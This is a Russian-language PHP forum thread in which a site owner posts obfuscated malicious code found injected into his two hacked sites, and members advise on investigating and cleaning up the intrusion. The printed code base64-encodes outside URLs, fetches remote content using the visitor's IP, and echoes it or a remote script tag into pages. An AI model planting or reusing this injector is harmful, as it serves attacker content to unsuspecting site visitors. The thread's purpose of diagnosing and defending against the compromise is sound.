Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/topic.php on line 737
Форумы портала PHP.SU :: Вредоносный код

 PHP.SU

 Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Без описания
Поиск в теме | Версия для печати
Denkill
Отправлено: 19 Июня, 2013 - 13:47:19
Post Id



Посетитель


Покинул форум
Сообщений всего: 330
Дата рег-ции: Янв. 2013  
Откуда: Барнаул


Помог: 7 раз(а)
Я не мог не обратить внимание, два моих сайта взломали и внесли вредоносный код
PHP:
скопировать код в буфер обмена
  1.  
  2. function sql2_safe($in) {
  3.         $rtn = base64_decode($in);
  4.         return $rtn;
  5. }
  6. function collectnewss() {
  7.  
  8.                 if (!isset($_COOKIE["iJijkdaMnerys"])) {
  9.         $value = 'yadeor';
  10.                 $ip = $_SERVER['REMOTE_ADDR'];
  11.         $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
  12.                 $file = @fopen ($get, "r");
  13.                 $content = @fread($file, 1000);
  14.                 @setcookie("iJijkdaMnerys", $value, time()+3600*24);
  15.                 if (!$content)
  16.                         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFuZ2VpcC5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
  17.                 else
  18.                         echo $content;
  19.  
  20.                 }
  21. }
  22. collectnewss ();
  23.  


Мне вот интересно это проделки одного и того же хакера или там эксплоит какой нибудь.
Может кто нибудь встречался

(Отредактировано автором: 19 Июня, 2013 - 13:54:49)



-----
Хо-Хо-Хо
 
 Top
EuGen Администратор
Отправлено: 19 Июня, 2013 - 13:55:43
Post Id


Профессионал


Покинул форум
Сообщений всего: 9095
Дата рег-ции: Июнь 2007  
Откуда: Berlin


Помог: 707 раз(а)
И в чём вопрос?


-----
Есть в мире две бесконечные вещи - это Вселенная и человеческая глупость. Но насчет первой .. я не уверен.
 
 Top
Denkill
Отправлено: 19 Июня, 2013 - 13:58:59
Post Id



Посетитель


Покинул форум
Сообщений всего: 330
Дата рег-ции: Янв. 2013  
Откуда: Барнаул


Помог: 7 раз(а)
Мне интересно как происходил взлом с какой стороны защищатся?


-----
Хо-Хо-Хо
 
 Top
EuGen Администратор
Отправлено: 19 Июня, 2013 - 14:02:32
Post Id


Профессионал


Покинул форум
Сообщений всего: 9095
Дата рег-ции: Июнь 2007  
Откуда: Berlin


Помог: 707 раз(а)
Через уязвимости в панели хостера, через XSS на Вашем же сайте, {...} - это невозможно сказать, просто глядя на код, который был добавлен к Вашему.


-----
Есть в мире две бесконечные вещи - это Вселенная и человеческая глупость. Но насчет первой .. я не уверен.
 
 Top
Zuldek
Отправлено: 19 Июня, 2013 - 14:14:02
Post Id


Постоянный участник


Покинул форум
Сообщений всего: 2122
Дата рег-ции: Июнь 2010  


Помог: 50 раз(а)
анализируйте логи сервера, ищите точки входа. Судя по вопросу, - самостоятельно вы это сделать не сможете, поэтому обратитесь к специалистам. Из их отчета и узнаете "откуда, что и где", они же, соответственно, уберут вредоносный код и закроют уязвимости через которые он был размещен. Стоимость услуги зависит от проекта, но, обычно, - эта услуга не из дешевых. Будьте готовы предоставить копию сайта, логи субд и веб-сервера. На форуме решать такие задачи вас не обучат в том числе по той причине, что многое субъективно и зависит от конкретного сайта.

(Отредактировано автором: 19 Июня, 2013 - 14:20:01)

 
 Top
Denkill
Отправлено: 19 Июня, 2013 - 14:25:56
Post Id



Посетитель


Покинул форум
Сообщений всего: 330
Дата рег-ции: Янв. 2013  
Откуда: Барнаул


Помог: 7 раз(а)
EuGen, Zuldek Нашел зашли через FTP сервер

Вот он: 212.95.32.78 Germany 16.05.2013 14:24:03


-----
Хо-Хо-Хо
 
 Top
AlexAnder
Отправлено: 19 Июня, 2013 - 14:32:03
Post Id



Частый посетитель


Покинул форум
Сообщений всего: 915
Дата рег-ции: Авг. 2012  
Откуда: Россия


Помог: 34 раз(а)
proxy detected, true hacker Подмигивание


-----
Оказывается, недостаточно читать справочники, чтобы правильно писать коды. sadex ©

Форумы стали местом обучения программированию, а не решения трудных вопросов. KingStar ©
 
 Top
armancho7777777 Супермодератор
Отправлено: 19 Июня, 2013 - 15:02:52
Post Id



Активный участник


Покинул форум
Сообщений всего: 4526
Дата рег-ции: Февр. 2011  
Откуда: Москва


Помог: 221 раз(а)
Denkill пишет:
Может кто нибудь встречался

Встречал. Код один в один.
Злоумышленник получив доступ к ftp может пройтись вверх по дереву и дописать его в каждом файле с именем index.php.
Вспомните, может давали кому из клиентов доступ к ftp.
 
 Top
Zuldek
Отправлено: 19 Июня, 2013 - 15:06:05
Post Id


Постоянный участник


Покинул форум
Сообщений всего: 2122
Дата рег-ции: Июнь 2010  


Помог: 50 раз(а)
Уязвимость одна-одинешенька, как и идеинтичный кусок вредоносного кода встречается не часто. Я все же рекомендую провести рекурсивное сравнение файлов каталогов сайта с его архивной/начальной копией и посмотреть отличии (вам вполне могли оставить шелы) с последующей, само собой, сменой всех явок-паролей на все: от ftp до доступа к базам данных.

(Отредактировано автором: 19 Июня, 2013 - 15:12:14)

 
 Top
Поиск в теме | Версия для печати
Страниц (1): [1]
Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)
« Прочее »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
  



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB